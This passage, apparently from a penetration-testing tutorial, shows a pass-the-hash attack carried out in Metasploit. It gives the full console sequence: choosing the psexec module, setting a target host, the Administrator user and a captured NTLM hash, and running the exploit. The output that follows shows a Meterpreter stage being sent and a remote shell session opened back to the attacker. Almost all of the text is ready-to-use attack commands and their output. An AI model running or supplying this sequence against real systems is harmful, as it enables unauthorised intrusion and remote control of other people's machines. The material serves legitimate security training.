To perform a pass the hash attack, we can use the Microsoft Windows Authenticated User Code Execution exploit module and use the previous capture hash instead of the plaintext password:
msf > use exploit/windows/smb/psexecmsf exploit(psexec) > set RHOST 192.168.216.10RHOST => 192.168.216.10msf exploit(psexec) > set SMBUser AdministratorSMBUser => Administratormsf exploit(psexec) > set SMBPASS aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50bSMBPASS => aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50bmsf exploit(psexec) > exploit ...[*] Sending stage (179267 bytes) to 192.168.216.10[*] Meterpreter session 1 opened (192.168.216.5:4444 -> 192.168.216.10:49293) at 2017-11-25 13:06:23 -0500meterpreter ...